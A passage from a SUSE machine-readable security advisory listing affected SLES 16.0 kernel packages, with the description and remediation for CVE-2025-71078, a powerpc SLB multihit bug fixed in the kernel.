"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71077"
},
{
"cve": "CVE-2025-71078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71078"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s/slb: Fix SLB multihit issue during SLB preload\n\nOn systems using the hash MMU, there is a software SLB preload cache that\nmirrors the entries loaded into the hardware SLB buffer. This preload\ncache is subject to periodic eviction - typically after every 256 context\nswitches - to remove old entry.\n\nTo optimize performance, the kernel skips switch_mmu_context() in\nswitch_mm_irqs_off() when the prev and next mm_struct are the same.\nHowever, on hash MMU systems, this can lead to inconsistencies between\nthe hardware SLB and the software preload cache.\n\nIf an SLB entry for a process is evicted from the software cache on one\nCPU, and the same process later runs on another CPU without executing\nswitch_mmu_context(), the hardware SLB may retain stale entries. If the\nkernel then attempts to reload that entry, it can trigger an SLB\nmulti-hit error.\n\nThe following timeline shows how stale SLB entries are created and can\ncause a multi-hit error when a process moves between CPUs without a\nMMU context switch.\n\nCPU 0 CPU 1\n----- -----\nProcess P\nexec swapper/1\n load_elf_binary\n begin_new_exc\n activate_mm\n switch_mm_irqs_off\n switch_mmu_context\n switch_slb\n /*\n * This invalidates all\n * the entries in the HW\n * and setup the new HW\n * SLB entries as per the\n * preload cache.\n */\ncontext_switch\nsched_migrate_task migrates process P to cpu-1\n\nProcess swapper/0 context switch (to process P)\n(uses mm_struct of Process P) switch_mm_irqs_off()\n switch_slb\n load_slb++\n /*\n * load_slb becomes 0 here\n * and we evict an entry from\n * the preload cache with\n * preload_age(). We still\n * keep HW SLB and preload\n * cache in sync, that is\n * because all HW SLB entries\n * anyways gets evicted in\n * switch_slb during SLBIA.\n * We then only add those\n * entries back in HW SLB,\n * which are currently\n * present in preload_cache\n * (after eviction).\n */\n load_elf_binary continues...\n setup_new_exec()\n slb_setup_new_exec()\n\n sched_switch event\n sched_migrate_task migrates\n process P to cpu-0\n\ncontext_switch from swapper/0 to Process P\n switch_mm_irqs_off()\n /*\n * Since both prev and next mm struct are same we don\u0027t call\n * switch_mmu_context(). This will cause the HW SLB and SW preload\n * cache to go out of sync in preload_new_slb_context. Because there\n * was an SLB entry which was evicted from both HW and preload cache\n * on cpu-1. Now later in preload_new_slb_context(), when we will try\n * to add the same preload entry again, we will add this to the SW\n * preload cache and then will add it to the HW SLB. Since on cpu-0\n * this entry was never invalidated, hence adding this entry to the HW\n * SLB will cause a SLB multi-hit error.\n */\nload_elf_binary cont\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71078",
"url": "https://www.suse.com/security/cve/CVE-2025-71078"
},
{
"category": "external",
"summary": "SUSE Bug 1256616 for CVE-2025-71078",
"url": "https://bugzilla.suse.com/1256616"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
